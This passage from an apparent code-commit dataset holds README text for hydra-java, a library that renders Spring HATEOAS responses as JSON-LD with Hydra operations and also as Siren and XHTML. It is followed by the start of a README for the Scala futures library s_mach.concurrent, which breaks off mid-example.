schema.org.\nBy simply calling my json transfer class `Person` and letting it have an attribute `name`, I want to get a publicly understandable\njson object, like this:\n\n[source, Java]\n----\n @Test\n public void testDefaultVocabIsRendered() throws Exception {\n\n class Person {\n private String name = \"Dietrich Schulten\";\n\n public String getName() {\n return name;\n }\n }\n\n mapper.writeValue(w, new Person());\n }\n----\n\nThe corresponding json-ld object, written by hydra-java:\n\n[source, Javascript]\n----\n{\n \"@context\": {\n \"@vocab\": \"http:\/\/schema.org\/\"\n },\n \"@type\": \"Person\",\n \"name\": \"Dietrich Schulten\"\n}\n----\n\nNote that I do not bind my clients to a server type `Person`. \nRather, client and server are talking about the thing http:\/\/schema.org\/Person[Person] as it is known and recognized by all major search engines.\n\nFor a more expressive example consider the json-ld example of http:\/\/schema.org\/MusicEvent[MusicEvent], which shows how a ticket offering could look like.\n\t\nIn a more complex scenario I want to use my own attribute names and object design and still be able to use schema.org or other vocabs to describe their meaning. In json-ld I can. See below for a listing of vocabularies.\n\n== First Steps\nIt is currently possible to render responses from a https:\/\/github.com\/spring-projects\/spring-hateoas[spring-hateoas] service based on Spring MVC with various message converters.\n\nLook into the https:\/\/github.com\/dschulten\/hydra-java\/blob\/master\/hydra-sample\/service\/src\/main\/java\/de\/escalon\/hypermedia\/sample\/Config.java[sample configuration] to see how you can set up the hydra message converter, but also the XHTML message converter and the Siren message converter with Spring MVC.\nThe tests in https:\/\/github.com\/dschulten\/hydra-java\/blob\/master\/hydra-jsonld\/src\/test\/java\/de\/escalon\/hypermedia\/hydra\/serialize\/JacksonHydraSerializerTest.java[JacksonHydraSerializerTest] demonstrate the usage of `@Vocab`, `@Expose` and `@Term`.\n\n== Features of hydra-spring\nThe conversion of a spring-hateoas Resource to hydra does the following:\n\n- renders a spring-hateoas `List<Link>` in a `Resource<T>` in json-ld style\n- renders spring-hateoas `Resources<T>` as `hydra:Collection`. If you use this feature, make sure you have a `@Term(define = \"hydra\", as = \"http:\/\/www.w3.org\/ns\/hydra\/core#\")` annotation in your context.\n- renders spring-hateoas `PagedResources<T>` as `hydra:Collection` with a `hydra:PartialCollectionView`. If you use this feature, make sure you have a `@Term(define = \"hydra\", as = \"http:\/\/www.w3.org\/ns\/hydra\/core#\")` annotation in your context.\n- renders response with `\"@vocab\" : \"http:\/\/schema.org\/\"` by default, a different `@vocab` can be defined on a class or package using the `@Vocab` annotation.\n- supports vocabularies in addition to the default vocabulary via terms in the `@context`. Use `@Term` in conjunction with `@Terms` on a class or package for this.\n- renders `@type` based on the Java class name by default, a vocabulary class can be produced instead using `@Expose` on the Java class.\n- renders attributes assuming that the attribute name is a property in the default vocab defined by `@vocab`. In other words, it renders an `offers` member as `\"offers\"` on a json-ld object with a context defining `\"@vocab\" : \"http:\/\/schema.org\"`, so that you end up with `\"http:\/\/schema.org\/offers\"` as linked data name for your `offers` member. To map a custom attribute name such as `foo` to an existing property in the default vocab or other vocabs use `@Expose` on the attribute and a term will be created in `@context` which maps your attribute to the vocab property you set as value of `@Expose`.\n- renders Java enums assuming that an enum value name is an enumerated value defined by the default vocab. In json-ld it is not only possible to have attribute names, but also attribute *values* that have linked data names. The idiom to express that is `\"@type\" : \"@vocab\"`. An example of this is http:\/\/schema.org\/OnSitePickup[OnSitePickup], which is an enum value for the property http:\/\/schema.org\/availableDeliveryMethod[availableDeliveryMethod]. If your Java enum value is ON_SITE_PICKUP, it matches the vocab value of OnSitePickup. It will be rendered as ON_SITE_PICKUP and hydra-java will add the necessary definition to the context which makes it clear that ON_SITE_PICKUP is actually `http:\/\/schema.org\/OnSitePickup`. If your Java enum value has a different name than the vocab value, use `@Expose` on the enum value to get a correct representation in the context. Note that you can also expose an enum value from a different vocabulary such as GoodRelations, see below.\n\nAs of version 0.2.0 hydra-java supports hydra:collection, hydra:operation and hydra:IriTemplate as well as reversed terms. To make this possible, you *must* use the `linkTo` and `methodOn` methods of AffordanceBuilder as a drop-in replacement for `ControllerLinkBuilder`. Templated links created by ControllerLinkBuilder will at least be rendered as IriTemplates, but only with limited information about the template variables.\n\nFurthermore, if you use these hydra features, make sure you have a `@Term(define = \"hydra\", as = \"http:\/\/www.w3.org\/ns\/hydra\/core#\")` annotation in your context.\n\n* renders a link to a remote collection as https:\/\/www.w3.org\/community\/hydra\/wiki\/Collection_Design[hydra:collection]. If you define the affordance to the remote collection with `AffordanceBuilder.rel()`, the remote collection gets a `hydra:subject` in its manages block, whereas if you define it with `reverseRel()` you get a `hydra:object`. To learn more about this design, consider the article https:\/\/www.w3.org\/community\/hydra\/wiki\/Collection_Design[Collection Design] in the hydra-cg wiki.\n* renders a templated link as `hydra:IriTemplate`. Method parameters can be annotated with `@Expose` to assign them a property URI, otherwise the variable name will be shown as a term in the current vocab. If you create a link with AffordanceBuilder's linkTo-method facilities and you pass `null` for arguments annotated with `@PathVariable` or `@RequestParam`, it will automatically become a templated link with variables for the `null` arguments.\n* renders a link to method handlers for any *combination* of GET, POST, PUT, PATCH and DELETE as `hydra:operation`. In order to express that multiple HTTP methods can be invoked on the same resource, use the `and()` method of AffordanceBuilder. See below for an example.\n* renders a single, manually created, non-templated Link or Affordance in json-ld style.\n* renders a POJO method parameter annotated with `@RequestBody` as expected rdfs:subClassOf. Use `@Expose` on the POJO class for a custom identifier. The setter methods on the bean appear as `hydra:supportedProperty`, and you can annotate them with `@Expose` to give them a semantic identifier. Again see below for an example.\n* uses certain schema.org facilities to describe expected request bodies. For this we need schema.org either as `@vocab` or as a `schema:` term. If you do not use schema.org as `@vocab`, make sure you have a `@Term(define = \"schema\", as = \"http:\/\/schema.org\/\")` in the context.\n** expresses default value and value constraints by means of http:\/\/schema.org\/PropertyValueSpecification. To specify such constraints, use the `@Input` annotation. Available constraints are min, max, step, minLength, maxLength and pattern.\n** expresses supported properties whose value is an object by nesting them via http:\/\/schema.org\/rangeIncludes.\n\n\n== Examples\n\n=== Designing a Hydra API ===\nSee my article https:\/\/www.w3.org\/community\/hydra\/wiki\/Restbucks_with_Hydra for an example of an ordering flow. There is also a http:\/\/jbosswildfly-escalon.rhcloud.com\/hypermedia-api\/store[Sample Shop] which demonstrates the ideas from the article.\n\n=== Live Demo\n\nUse a ReST client to access a http:\/\/jbosswildfly-escalon.rhcloud.com\/hypermedia-api\/events[Sample Events API] to see the artifact hydra-sample at work. OpenShift sometimes completely shuts down the container, please try several times if you run into server errors when first accessing the sample.\n\nBrowsers will show the html representation of the API by default, which uses the `XhtmlResourceMessageConverter`. Sending `Accept: application\/ld+json` will get you hydra, but `application\/json` or `application\/hal+json` work as well. \nWhen you POST or PUT, make sure you add a Content-Type header matching your request.\n\n\n=== Exposing Java Bean Attributes\n\nAssuming a Java enum whose enum values are exposed as values from GoodRelations and which appears on an Offer object with GoodRelations term:\n\nThe example shows a Java enum named `BusinessFunction\u02cb whose enum values are exposed as values from GoodRelations. The enum appears on an Offer object with a GoodRelations term:\n\n[source, Java]\n----\n enum BusinessFunction {\n @Expose(\"gr:LeaseOut\")\n RENT,\n @Expose(\"gr:Sell\")\n FOR_SALE,\n @Expose(\"gr:Buy\")\n BUY\n }\n\n @Term(define = \"gr\", as = \"http:\/\/purl.org\/goodrelations\/v1#\")\n class Offer {\n public BusinessFunction businessFunction;\n ...\n }\n----\n\nThe json-ld output written by hydra-java makes the GoodRelations url known under the shorthand `gr`, says that the `businessFunction` property contains values defined by a vocabulary and maps the Java enum value `RENT` to its linked data name `\"gr:LeaseOut\"`.\n\n[source, Javascript]\n----\n{\n \"@context\": {\n \"@vocab\": \"http:\/\/schema.org\/\",\n \"gr\": \"http:\/\/purl.org\/goodrelations\/v1#\",\n \"businessFunction\": {\"@type\": \"@vocab\"},\n \"RENT\": \"gr:LeaseOut\"\n },\n \"@type\": \"Offer\",\n \"businessFunction\": \"RENT\"\n}\n----\n\n=== AffordanceBuilder for rich hyperlinks\n\nA hypermedia affordance is a rich hyperlink. That means, it not only contains a URI or a URITemplate, but also information about the usage of the URI, such as supported http methods and expected parameters. The term 'hypermedia affordance' is a neologism made popular by http:\/\/amundsen.com\/blog\/archives\/1109[Mike Amundsen], following an earlier reference in http:\/\/roy.gbiv.com\/talks\/200804_REST_ApacheCon.pdf[A little REST and Relaxation] by Roy Fielding.\nA hydra-java `Affordance` can be used to render media-types which support this kind of information: first and foremost hydra, but it is quite easy to add message converters for other media types once the basic information is available.\n\nVersion 0.2.0 provides an `AffordanceBuilder` class which is a drop-in replacement for the spring-hateoas `ControllerLinkBuilder`. The `AffordanceBuilder` does not depend on hydra or json-ld. It lives in the standalone jar spring-hateoas-ext and can also be used to render other media types than json-ld. One example is the `XhtmlResourceMessageConverter` which allows you to render your API responses as HTML forms.\nUse the `AffordanceBuilder` to build `Affordance` instances which inherit from the spring-hateoas `Link` but add the following traits to it:\n\n* Full support for all attributes of a http Link header as described by the https:\/\/tools.ietf.org\/html\/rfc5988[web linking rfc 5988]\n* Support for templated link headers as described by the http:\/\/tools.ietf.org\/html\/draft-nottingham-link-template-01[Link-Template Header Internet draft]\n* Improved creation of link templates. You can use the `linkTo-methodOn` technique to create templated links to handler methods. By simply leaving a parameter undefined (`null`) in a `methodOn` sample call, a template variable will be applied to your link.\n* Facility to chain several method invocations on the same resource. If the same link is used to PUT and DELETE a resource, use `AffordanceBuilder.and()` to add both method handlers to the affordance.\n* Has action descriptors with information about http methods and expected request data. Based on reflection and a minimal set of annotations it is possible to render forms-like affordances with quite precise information about expected input.\n\nIn the following we use `AffordanceBuilder` to add a `self` rel that can be used with GET, PUT and DELETE to an event bean.\nFirst we wrap the event into a `Resource` so we can add affordances to it. Then we use the `linkTo-methodOn` technique three times to describe that the self rel can be used to get, update and delete the event.\n\n[source, Java]\n----\n\n import static de.escalon.hypermedia.spring.AffordanceBuilder.linkTo;\n import static de.escalon.hypermedia.spring.AffordanceBuilder.methodOn;\n\n @Controller\n @RequestMapping(\"\/events\")\n public class EventController {\n\n @RequestMapping(value = \"\/{eventId}\", method = RequestMethod.GET)\n public @ResponseBody Resource<Event> getEvent(@PathVariable Integer eventId) {\n \/\/ get the event from some backend, then:\n Resource<Event> eventResource = new Resource<Event>(event);\n\n \/\/ using AffordanceBuilder.linkTo and AffordanceBuilder.methodOn\n \/\/ instead of ControllerLinkBuilder methods\n eventResource.add(linkTo(methodOn(EventController.class)\n .getEvent(event.id))\n .and(linkTo(methodOn(EventController.class) \/\/ 2nd action with .and\n .updateEvent(event.id, event)))\n .and(linkTo(methodOn(EventController.class) \/\/ 3rd action with .and\n .deleteEvent(event.id)))\n .withSelfRel());\n return eventResource;\n }\n\n @RequestMapping(value = \"\/{eventId}\", method = RequestMethod.GET)\n public @ResponseBody Resource<Event> getEvent(@PathVariable Integer eventId) {\n ...\n }\n\n\n @RequestMapping(value = \"\/{eventId}\", method = RequestMethod.PUT)\n public ResponseEntity<Void> updateEvent(@PathVariable int eventId, @RequestBody Event event) {\n ...\n }\n\n @RequestMapping(value = \"\/{eventId}\", method = RequestMethod.DELETE)\n public ResponseEntity<Void> deleteEvent(@PathVariable int eventId) {\n ...\n }\n }\n\n public class Event {\n public final int id;\n public final String performer;\n public final String location;\n private EventStatusType eventStatus;\n private String name;\n\n public Event(int id, String performer, String name, String location, EventStatusType eventStatus) {\n ...\n }\n\n public void setEventStatus(EventStatusType eventStatus) {\n this.eventStatus = eventStatus;\n }\n }\n\n----\n\nWhen rendered with the `HydraMessageConverter`, the resulting json-ld event object has the corresponding GET, PUT and DELETE operations. The PUT operation expects an http:\/\/schema.org\/Event[Event] with a property http:\/\/schema.org\/eventStatus[eventStatus]. By default, writable properties (with a setter following the JavaBean conventions) are rendered as `hydra:supportedProperty`. The URI to be used by the operations is the `@id` of the object that has a `hydra:operation`.\n\n[source, Javascript]\n----\n {\n \"@type\": \"Event\",\n \"@id\": \"http:\/\/localhost\/events\/1\",\n \"performer\": \"Walk off the Earth\",\n \"location\": \"Wiesbaden\",\n \"name\": \"Gang of Rhythm Tour\",\n \"eventStatus\" : \"EVENT_SCHEDULED\",\n \"hydra:operation\": [\n {\n \"hydra:method\": \"GET\"\n },\n {\n \"hydra:method\": \"PUT\",\n \"hydra:expects\":\n {\n \"@type\": \"Event\",\n \"hydra:supportedProperty\": [\n {\n \"hydra:property\": \"eventStatus\",\n \"hydra:required\": \"true\",\n \"readonlyValue\": false\n },\n {\n \"hydra:property\": \"location\",\n \"defaultValue\": \"Wiesbaden\",\n \"readonlyValue\": false\n },\n ... other properties required for a replacing PUT\n ]\n }\n },\n {\n \"hydra:method\": \"DELETE\"\n }\n ]\n }\n----\n\n\n=== Specifying Property Value Requirements (from V. 0.2.0)\n\nNow let us tell the client a range of possible values for a property. We want to allow clients to add reviews for the work performed at an event. For this, we add a `Resource<CreativeWork>` to the `Event`, so that we can define an affordance on the creative work which allows clients to send reviews.\n\n[source, Java]\n----\n public class Event {\n ...\n private final Resource<CreativeWork> workPerformed;\n\n public Resource<CreativeWork> getWorkPerformed() {\n return workPerformed;\n }\n ...\n }\n\n \/\/ in EventController:\n @RequestMapping(value = \"\/{eventId}\", method = RequestMethod.GET)\n public @ResponseBody Resource<Event> getEvent(@PathVariable Integer eventId) {\n\n \/\/ with an event from backend do this:\n\n event.getWorkPerformed() \/\/ <-- must be a Resource<CreativeWork>\n .add(linkTo(methodOn(ReviewController.class) \/\/ <-- must use AffordanceBuilder.linkTo here\n .addReview(event.id, new Review(null, new Rating(3)))) \/\/ <-- default ratingValue 3\n .withRel(\"review\"));\n ...\n }\n\n @Controller\n @RequestMapping(\"\/reviews\")\n public class ReviewController {\n\n @RequestMapping(value = \"\/events\/{eventId}\", method = RequestMethod.POST)\n public ResponseEntity<Void> addReview(@PathVariable int eventId, @RequestBody Review review) {\n \/\/ add review and return 201 Created\n }\n }\n----\n\nWe expect that clients post a Review with a review body and a rating. The review body and the rating value have input constraints, so we annotate the method `setReviewBody` with `@Input(pattern=\".{10,}\")` and `setRatingValue` with `@Input(min = 1, max = 5, step = 1)`, as shown below.\n\n[source, Java]\n----\n\n public class Rating {\n private String ratingValue;\n\n @JsonCreator\n public Rating(@JsonProperty(\"ratingValue\") Integer ratingValue) {\n ..\n }\n\n\n public void setRatingValue(@Input(min = 1, max = 5, step = 1) String ratingValue) {\n this.ratingValue = ratingValue;\n }\n }\n\n\n public class Review {\n\n private String reviewBody;\n private Rating reviewRating;\n\n @JsonCreator\n public Review(@JsonProperty(\"reviewBody\") String reviewBody,\n @JsonProperty(\"reviewRating\") Rating reviewRating) {\n ...\n }\n\n public void setReviewBody(@Input(pattern=\".{10,}\") String reviewBody) {\n ...\n }\n\n public void setReviewRating(Rating rating) {\n this.reviewRating = rating;\n }\n }\n\n----\n\nIn the resulting json-ld we use schema.org's http:\/\/schema.org\/PropertyValueSpecification[PropertyValueSpecification] to express the input constraints `minValue`, `maxValue`, `stepValue` and `valuePattern`, as well as `defaultValue` containing the rating value `3` that was passed to the sample method invocation with `methodOn`. Note that the creative work has a `review` attribute now, although the `CreativeWork` pojo has no such property. It appears because we added a rel `review` to the workPerformed resource.\n\nRight now it is not possible to specify a list of expected values, neither with hydra nor with `schema:PropertyValueSpecification`. If you are interested in that, look into https:\/\/github.com\/HydraCG\/Specifications\/issues\/82[#82 Add support for allowed literals and allowed individuals] and participate in the discussion in the http:\/\/lists.w3.org\/Archives\/Public\/public-hydra\/2015Jan\/0019.html[Hydra-CG mailing list].\n\n[source, Javascript]\n----\n{\n \"@context\":\n {\n \"@vocab\": \"http:\/\/schema.org\/\",\n \"hydra\": \"http:\/\/www.w3.org\/ns\/hydra\/core#\",\n \"eventStatus\":\n {\n \"@type\": \"@vocab\"\n },\n \"EVENT_SCHEDULED\": \"EventScheduled\"\n },\n \"@type\": \"Event\",\n \"performer\": \"Walk off the Earth\",\n \"location\": \"Wiesbaden\",\n \"eventStatus\": \"EVENT_SCHEDULED\",\n \"workPerformed\": {\n \"@type\": \"CreativeWork\",\n \"name\": \"Gang of Rhythm Tour\",\n \"review\": {\n \"@id\": \"http:\/\/localhost:8210\/webapp\/hypermedia-api\/reviews\/events\/1\",\n \"hydra:operation\": [\n {\n \"@type\": \"ReviewAction\",\n \"hydra:method\": \"POST\",\n \"hydra:expects\": {\n \"@type\": \"Review\",\n \"hydra:supportedProperty\": [\n {\n \"@type\": \"PropertyValueSpecification\",\n \"hydra:property\": \"reviewBody\",\n \"valuePattern\": \".{10,}\"\n },\n {\n \"hydra:property\": \"reviewRating\",\n \"rangeIncludes\": {\n \"@type\": \"Rating\",\n \"hydra:supportedProperty\": [\n {\n \"@type\": \"PropertyValueSpecification\",\n \"hydra:property\": \"ratingValue\",\n \"defaultValue\": 3,\n \"maxValue\": 5,\n \"minValue\": 1,\n \"stepValue\": 1\n }\n ]\n }\n }\n ]\n }\n }\n ]\n }\n }\n}\n\n----\n\nIf an expected property on a request object holds a nested json object in turn, hydra-java will render it following a proposal from https:\/\/github.com\/HydraCG\/Specifications\/issues\/26[Hydra-CG Issue 26] using http:\/\/schema.org\/rangeIncludes[schema:rangeIncludes]. The fact that this issue is not resolved yet is the main reason why hydra-java 0.2.0 is an alpha release. So be especially wary that changes are likely for the way hydra-java prescribes nested properties.\n\n\n=== Rendering other media types (from V. 0.2.0-alpha8)\n\nClients should be able to request a media-type they understand by means of content negotiation. Following this principle, the spring-hateoas-ext package provides the foundation to render hypermedia types which describe expected requests - not only as json-ld, but also as other media types. \n\n==== XhtmlResourceMessageConverter\n\n\nThe `XhtmlResourceMessageConverter` is the second message converter in hydra-java which makes use of affordances built by `AffordanceBuilder`.\n\nIf you add a `JsonLdDocumentationProvider` on the converter, it will render bean attributes as hyperlinks which point to their documentation on schema.org or other vocabularies, provided that your java beans are annotated with the necessary information.\n\nThe xhtml response renders bootstrap conforming markup, you can add bootstrap css as shown below, or your own stylesheets.\n\n[source, Java]\n----\n\n@Configuration\n@EnableWebMvc\npublic class Config extends WebMvcConfigurerAdapter {\n ...\n @Override\n public void configureMessageConverters(List<HttpMessageConverter<?>> converters) {\n converters.add(halConverter());\n converters.add(xhtmlMessageConverter());\n converters.add(jsonConverter());\n }\n\n private HttpMessageConverter<?> xhtmlMessageConverter() {\n XhtmlResourceMessageConverter xhtmlResourceMessageConverter = new XhtmlResourceMessageConverter();\n xhtmlResourceMessageConverter.setStylesheets(\n Arrays.asList(\n \"https:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.4\/css\/bootstrap.min.css\"\n ));\n xhtmlResourceMessageConverter.setDocumentationProvider(new JsonLdDocumentationProvider());\n return xhtmlResourceMessageConverter;\n }\n ...\n}\n\n----\n\nTo make the API browsable, PUT and DELETE are tunneled through POST. This is necessary because the HTML media type does not support PUT or DELETE, the browser cannot handle a form which has other methods than GET or POST. Spring-MVC has a servlet filter which makes tunneling easy. The web.xml of the hydra-sample service shows how to enable that filter:\n\n[source, XML]\n----\n <filter>\n <filter-name>HiddenHttpMethodFilter<\/filter-name>\n <filter-class>org.springframework.web.filter.HiddenHttpMethodFilter<\/filter-class>\n <\/filter>\n <filter-mapping>\n <filter-name>HiddenHttpMethodFilter<\/filter-name>\n <servlet-name>hypermedia-api<\/servlet-name>\n <\/filter-mapping>\n----\n\n\n==== SirenMessageConverter (from V. 0.2.0-beta5)\nThe `SirenMessageConverter` renders Spring Hateoas Responses as https:\/\/github.com\/kevinswiber\/siren[Siren] messages, using the media type `application\/vnd.siren+json`.\n\n* maps a plain Spring Hateoas `Link` to an embedded link or navigational link.\n* a templated link becomes a Siren GET action with named siren fields for the template query variables\n* in order to produce more expressive Siren actions, use the `linkTo-methodOn` idiom of `AffordanceBuilder` to point to your methods, as shown above for the sample `EventController` in the section AffordanceBuilder.\n* possible values found by `AffordanceBuilder` are treated as checkbox or radio button fields, following the technique discussed in the https:\/\/groups.google.com\/forum\/#!topic\/siren-hypermedia\/8mbOX44gguU[Siren group].\n* field types can be defined via the value of the `@Input` annotation on method parameters (e.g. `@Input(Type.DATE)`).\n* nested `Resource` objects are shown as embedded representations\n* distinguishes navigational and embedded links by a default list of navigational rels. This list can be customized via `SirenMessageConverter.addNavigationalRels`.\n* for sub-entities the property name is used as relation name. The Siren class name is derived from the Java class name. The rel names can be customized using a `DocumentationProvider` implementation, e.g. the `JsonLdDocumentationProvider` from hydra-jsonld will make use of `@Expose` and `@Vocab` annotations on your response bean packages.\n* relies on `XhtmlMessageConverter` to process incoming form-urlencoded requests and on `MappingJackson2HttpMessageConverter` for json requests.\n\nThe Siren output for the sample `EventController` above is shown below. Note that the JsonLdDocumentationProvider has created the link relation type `http:\/\/schema.org\/workPerformed`. One could also use the UrlPrefixDocumentationProvider for simple URL prefixing.\n[source, Javascript]\n----\n{\n \"class\": [\n \"event\"\n ],\n \"properties\": {\n \"performer\": \"Walk off the Earth\",\n \"eventStatus\": \"EVENT_SCHEDULED\",\n \"location\": \"Wiesbaden\"\n },\n \"entities\": [\n {\n \"class\": [\n \"creativeWork\"\n ],\n \"rel\": [\n \"http:\/\/schema.org\/workPerformed\"\n ],\n \"properties\": {\n \"name\": \"Gang of Rhythm Tour\"\n },\n \"actions\": [\n {\n \"name\": \"addReview\",\n \"method\": \"POST\",\n \"href\": \"http:\/\/example.com\/webapp\/hypermedia-api\/reviews\/events\/1\",\n \"fields\": [\n {\n \"name\": \"reviewBody\",\n \"type\": \"text\"\n },\n {\n \"name\": \"reviewRating.ratingValue\",\n \"type\": \"number\",\n \"value\": \"3\"\n }\n ]\n }\n ]\n }\n ],\n \"actions\": [\n {\n \"name\": \"updateEvent\",\n \"method\": \"PUT\",\n \"href\": \"http:\/\/example.com\/webapp\/hypermedia-api\/events\/1\",\n \"fields\": [\n {\n \"name\": \"location\",\n \"type\": \"text\",\n \"value\": \"Wiesbaden\"\n },\n {\n \"name\": \"eventStatus\",\n \"type\": \"radio\",\n \"value\": [\n {\n \"value\": \"EVENT_CANCELLED\"\n },\n {\n \"value\": \"EVENT_POSTPONED\"\n },\n {\n \"value\": \"EVENT_SCHEDULED\",\n \"selected\": true\n },\n {\n \"value\": \"EVENT_RESCHEDULED\"\n }\n ]\n }\n ... other properties required for a replacing PUT\n ]\n },\n {\n \"name\": \"deleteEvent\",\n \"method\": \"DELETE\",\n \"href\": \"http:\/\/example.com\/webapp\/hypermedia-api\/events\/1\"\n }\n ],\n \"links\": [\n {\n \"rel\": [\n \"self\"\n ],\n \"href\": \"http:\/\/example.com\/webapp\/hypermedia-api\/events\/1\"\n }\n ]\n}\n----\n\n\n\n== Maven Support\nThe latest Maven releases of hydra-java are in Maven central. These are the maven coordinates for hydra-spring.\n\n[source, XML]\n----\n<dependency>\n <groupId>de.escalon.hypermedia<\/groupId>\n <artifactId>hydra-spring<\/artifactId>\n <version>0.3.0-beta6<\/version>\n<\/dependency>\n----\n\nIf you only want to use `AffordanceBuilder` or the `XhtmlResourceMessageConverter` and `SirenMessageConverter` without the json-ld dependencies, use spring-hateoas-ext alone:\n\n[source, XML]\n----\n<dependency>\n <groupId>de.escalon.hypermedia<\/groupId>\n <artifactId>spring-hateoas-ext<\/artifactId>\n <version>0.3.0-beta6<\/version>\n<\/dependency>\n----\n\n== Vocabularies\nWhat if schema.org is not sufficient? On\nhttp:\/\/lov.okfn.org\/dataset\/lov\/[Linked Open Vocabularies] you can search for terms in other vocabularies. Another option is to http:\/\/www.w3.org\/wiki\/WebSchemas\/SchemaDotOrgProposals[propose an addition to schema.org].\n\nIf you are unsure which vocab to use, ask on the http:\/\/lists.w3.org\/Archives\/Public\/public-hydra\/[ hydra mailing list].\n\n== What's new\n=== 0.3.0\n\n- extraction of ActionDescriptor and ActionInputParameter interfaces, coordinating with http:\/\/www.hdiv.org\/[HDIV] to get forms into spring-hateoas\n- optimization of json-ld output: do not repeat terms which are in the parent context already\n- simple feature to use query parameters mapped to parameter bean or parameter Map annotated with @Input rather than single RequestParam arguments. Right now, it can only be used to build a UriTemplate, no description for the template variables is available yet. Use `@Input(include=..., exclude=...)` to filter applicable bean properties or describe expected Map values. The UriTemplate for such an affordance is available via `Affordance.getUriTemplateComponents().toString()`, but not via `Affordance.toString()` to keep an Affordance created via AffordanceBuilder compatible with a Link created by ControllerLinkBuilder.\n\n\n\t\n== Acknowledgements\n\nI would like to thank Mike Amundsen, Stu Charlton, Jon Moore, J\u00f8rn Wildt, Mike Kelly, Markus Lanthaler, Gregg Kellog and Manu Sporny for their inspiration and for valuable comments along the way. Also thanks to Oliver Gierke who has been accepting some of my pull requests to spring-hateoas.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"53a7eb98823a9b6e483869a0a8c2d6e3258be65f","subject":"work on readme [skip ci]","message":"work on readme [skip ci]\n","repos":"S-Mach\/s_mach.concurrent","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"s_mach.concurrent: Futures utility library\n===============================================================\nLance Gatlin <lance.gatlin@gmail.com>\nv1,13-Jul-2014\n:blogpost-status: unpublished\n:blogpost-categories: s_mach, scala\n\n*UNDER CONSTRUCTION*\n\nimage:https:\/\/travis-ci.org\/S-Mach\/s_mach.concurrent.svg[Build Status, link=\"https:\/\/travis-ci.org\/S-Mach\/s_mach.concurrent\"] image:https:\/\/coveralls.io\/repos\/S-Mach\/s_mach.concurrent\/badge.png[Test Coverage,link=\"https:\/\/coveralls.io\/r\/S-Mach\/s_mach.concurrent\"] https:\/\/github.com\/S-Mach\/s_mach.concurrent[Code] http:\/\/S-Mach.github.io\/s_mach.concurrent[Scaladoc]\n\n+s_mach.concurrent+ is an open-source Scala library that provides concurrent execution flow control primitives for\nworking with the scala.concurrent standard library.\n\n* Adds new flow control primitives +concurrently+, +serially+ and +workers+ for control of collection concurrent operations\n* Adds progress reporting, retry and throttle control for collection concurrent operations\n* Adds +ScheduledExecutionContext+, a wrapper for +java.util.concurrent.ScheduledExecutorService+ that provides a functional style interface for scheduling delayed and periodic tasks\n* Adds non-blocking concurrent control primitives such as +Barrier+, +Latch+, +Lock+, +Semaphore+ and +Queue+\n* Overcomes some design limitations of the scala.concurrent library\n* Provides convenience methods for writing more readable, concise and DRY concurrent code such as +Future.get+, +Future.toTry+ and +Future.fold+\n\n=== Include in SBT\n1. +s_mach.concurrent+ is currently compatible with only Scala 2.11 (but there are plans to add 2.10.4 support)\n2. Add to +build.sbt+ OR +~\/.sbt\/{verison}\/build.sbt+\n+\n[source,sbt,numbered]\n----\nresolvers += Resolver.sonatypeRepo(\"snapshots\")\n----\n+\n3. Add to +build.sbt+\n+\n[source,sbt,numbered]\n----\nlibraryDependencies += \"net.s_mach\" %% \"concurrent\" % \"0.1-SNAPSHOT\"\n----\n\n\n=== Imports for Examples\nAll code examples assume the following imports:\n[source,scala,numbered]\n----\nimport scala.util._\nimport scala.concurrent._\nimport scala.concurrent.ExecutionContext.Implicits.global\nimport scala.concurrent.duration._\nimport s_mach.concurrent._\nimport s_mach.concurrent.util._\n\ncase class Item(id: String, value: Int, relatedItemId: String)\ndef read(id: String) : Future[Item] = Future { Thread.sleep(1000); println(id); Item(id,id.toInt,(id.toInt+1).toString) }\ndef readFail(id: String) : Future[Item] = Future { Thread.sleep(1000); println(id); throw new RuntimeException(id.toString) }\ndef longRead(id: String) : Future[Item] = Future { Thread.sleep(2000); println(id); Item(id,id.toInt,(id.toInt+1).toString) }\ndef write(id: String, item: Item) : Future[Boolean] = Future { Thread.sleep(1000); println(id); true }\ndef writeFail(id: String, item: Item) : Future[Boolean] = Future { Thread.sleep(1000); println(id); throw new RuntimeException(id.toString) }\n----\n\n=== Transforming and traversing collections serially and concurrently\nA common task when working with futures is either transforming or traversing a collection that will call a method that\nreturns a future. The standard idiom for performing this task only provides methods for concurrent operation and, with\nenough nesting, leads to difficult to read code:\n\n.Example 1: Transform and traverse collections, standard method\n[source,scala,numbered]\n----\nval oomItemIdBatch = (1 to 10).toList.map(_.toString).grouped(2).toList\nval future = { \/\/ necessary for pasting into repl\n for {\n oomItem <- {\n println(\"Reading...\")\n oomItemIdBatch\n \/\/ Serially perform read of each batch\n .foldLeft(Future.successful(List[Item]())) { (facc, idBatch) =>\n for {\n acc <- facc\n \/\/ Concurrently read batch\n oomItem <- Future.sequence(idBatch.map(read))\n } yield acc ::: oomItem\n }\n }\n _ = println(\"Computing...\")\n oomNewItemBatch = oomItem.map(item => item.copy(value = item.value + 1)).grouped(2).toList\n oomResult <- {\n println(\"Writing...\")\n oomNewItemBatch\n \/\/ Serially perform write of each batch\n .foldLeft(Future.successful(List[Boolean]())) { (facc, itemBatch) =>\n for {\n acc <- facc\n \/\/ Concurrently write batch\n oomResult <- Future.sequence(itemBatch.map(item => write(item.id, item)))\n } yield acc ::: oomResult\n }\n }\n } yield oomResult.forall(_ === true)\n}\n----\n\nThe same code, rewritten using +s_mach.concurrent+:\n\n.Example 2: Using +s_mach.concurrent+ to serially or concurrently transform and traverse collections:\n[source,scala,numbered]\n----\nval oomItemIdBatch = (1 to 10).toList.map(_.toString).grouped(2).toList\nval future = { \/\/ necessary for pasting into repl\n for {\n oomItem <- {\n println(\"Reading...\")\n oomItemIdBatch.serially.flatMap(_.concurrently.map(read))\n }\n _ = println(\"Computing...\")\n oomNewItemBatch = oomItem.map(item => item.copy(value = item.value + 1)).grouped(10).toVector\n oomResult <- {\n println(\"Writing...\")\n oomNewItemBatch.serially.flatMap(_.concurrently.map(item => write(item.id, item)))\n }\n } yield oomResult.forall(_ === true)\n}\n----\n\n=== Transforming and traversing collections using workers\n\n+s_mach.concurrent+ provides the +workers+ method which allows specifying the maximum number of concurrent operations.\n\n.Example 3: Using +s_mach.concurrent+ workers to transform and traverse collections:\n[source,scala,numbered]\n----\nval oomItemIdBatch = (1 to 10).toList.map(_.toString).grouped(2).toList\nval future = { \/\/ necessary for pasting into repl\n for {\n oomItem <- {\n 